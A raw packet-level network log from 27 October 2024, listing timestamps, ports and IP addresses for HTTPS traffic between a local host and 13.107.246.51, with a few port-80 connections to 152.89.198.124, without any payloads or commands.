Oct 27, 2024 17:11:46.396137953 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.396624088 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.396852016 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.396902084 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.396905899 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.396960020 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397012949 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397012949 CET	57962	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397030115 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.397049904 CET	443	57962	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.397593975 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397614956 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.397684097 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397739887 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397774935 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.397806883 CET	57959	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397818089 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.397836924 CET	443	57959	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.397842884 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.400651932 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.400664091 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.400737047 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.400918961 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.400932074 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.401521921 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.401540995 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:46.401598930 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.401700020 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:46.401711941 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.035291910 CET	80	57963	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:47.037868023 CET	57963	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:47.133800030 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.135401011 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.135427952 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.135788918 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.136013985 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.136019945 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.136219978 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.136240959 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.136688948 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.136694908 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.137343884 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.137737036 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.137784004 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.138123989 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.138138056 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.141805887 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.143131018 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.143147945 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.143621922 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.143631935 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.152368069 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.155201912 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.155210972 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.155570030 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.155581951 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.264617920 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.264650106 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.264702082 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.264760017 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.264916897 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.264916897 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.266895056 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.266913891 CET	57968	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.266923904 CET	443	57968	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267292976 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267298937 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267369032 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267395020 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267420053 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267420053 CET	57966	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267448902 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267474890 CET	443	57966	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267507076 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267765045 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267831087 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267890930 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267905951 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.267934084 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267941952 CET	57965	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.267950058 CET	443	57965	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.268249989 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.268280983 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.269666910 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.269686937 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.270020008 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.270040035 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.270040989 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.270169020 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.270180941 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.270198107 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.270304918 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.270328045 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.272382975 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.272521973 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.272586107 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.272720098 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.272721052 CET	57964	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.272737026 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.272758007 CET	443	57964	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.274804115 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.274832964 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.274914026 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.275058985 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.275074005 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.284434080 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.284730911 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.284790039 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.284918070 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.284924984 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.284935951 CET	57967	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.284940004 CET	443	57967	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.287211895 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.287245989 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:47.287352085 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.287467957 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:47.287496090 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.002679110 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.003660917 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.003679037 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.004420042 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.004424095 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.008183956 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.008601904 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.008640051 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.009237051 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.009251118 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.013092995 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.013427973 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.013442993 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.013887882 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.013899088 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.015149117 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.015486956 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.015511990 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.016019106 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.016026974 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.022505045 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.022774935 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.022809029 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.023156881 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.023169994 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.137007952 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.137028933 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.137094021 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.137096882 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.137140036 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.137428999 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.137444019 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.137451887 CET	57970	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.137456894 CET	443	57970	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.140047073 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.140233994 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.140301943 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.140441895 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.140480042 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.140547037 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.140616894 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.140616894 CET	57971	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.140646935 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.140667915 CET	443	57971	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.141483068 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.141499996 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.142535925 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.142589092 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.142796993 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.142920017 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.142945051 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.145133972 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.145328999 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.145397902 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.145428896 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.145428896 CET	57969	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.145442963 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.145462036 CET	443	57969	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.147274971 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.147301912 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.147363901 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.147499084 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.147511005 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.148859024 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.148904085 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.148953915 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.148967981 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.149064064 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.149092913 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.149115086 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.149127960 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.149127960 CET	57972	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.149137020 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.149144888 CET	443	57972	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.150741100 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.150777102 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.150845051 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.150952101 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.150966883 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.157944918 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.157969952 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.158027887 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.158030033 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.158077955 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.158185959 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.158185959 CET	57973	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.158205986 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.158229113 CET	443	57973	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.159730911 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.159739971 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.159800053 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.159918070 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.159928083 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.629611969 CET	57963	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:48.630012989 CET	57979	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:48.780766964 CET	80	57979	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:48.780833006 CET	80	57963	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:48.780981064 CET	57963	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:48.781006098 CET	57979	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:48.781318903 CET	57979	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:48.786614895 CET	80	57979	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:48.911144972 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.911854982 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.911878109 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.912533045 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.912539959 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.915554047 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.915852070 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.915867090 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.916279078 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.916366100 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.916371107 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.916542053 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.916548967 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.917004108 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.917009115 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.917460918 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.917697906 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.917732954 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.917771101 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.917989969 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.918011904 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.918140888 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.918154955 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:48.918431044 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:48.918441057 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.041671991 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.041692019 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.041743994 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.041747093 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.041790962 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.041975021 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.041994095 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.042007923 CET	57974	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.042013884 CET	443	57974	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.042881012 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.043028116 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.043095112 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.043118954 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.043135881 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.043147087 CET	57976	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.043150902 CET	443	57976	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.045249939 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.045310020 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.045397043 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.045418024 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.045484066 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.045520067 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.045556068 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.045556068 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.045752048 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.045777082 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.046912909 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.047418118 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.047478914 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.047508955 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.047508955 CET	57977	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.047525883 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.047537088 CET	443	57977	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.049678087 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.049721003 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.049734116 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.049743891 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.049784899 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.049827099 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.049906969 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.049911022 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.049918890 CET	57978	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.049921989 CET	443	57978	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.049998999 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.050020933 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.051199913 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.051244020 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.051305056 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.051341057 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.051378965 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.051428080 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.051465034 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.051465034 CET	57975	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.051482916 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.051503897 CET	443	57975	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.052215099 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.052254915 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.052320957 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.052436113 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.052459955 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.053634882 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.053644896 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.053699970 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.053834915 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.053844929 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.677695036 CET	80	57979	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:49.677793980 CET	57979	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:49.783046961 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.784095049 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.785630941 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.785676003 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.786127090 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.786139965 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.786339998 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.786355972 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.786653996 CET	57982	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.786664963 CET	443	57982	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.791996956 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.792387962 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.792465925 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.792834044 CET	57981	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.792846918 CET	443	57981	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.793735027 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.794054031 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.794084072 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.794459105 CET	57983	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.794470072 CET	443	57983	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.809715033 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.810127974 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.810153008 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.810687065 CET	57984	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.810691118 CET	443	57984	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.912997961 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.913052082 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.913122892 CET	57980	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:49.913151979 CET	443	57980	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:49.913181067 CET	443	57980	13.107.246.51	192.168.2.4
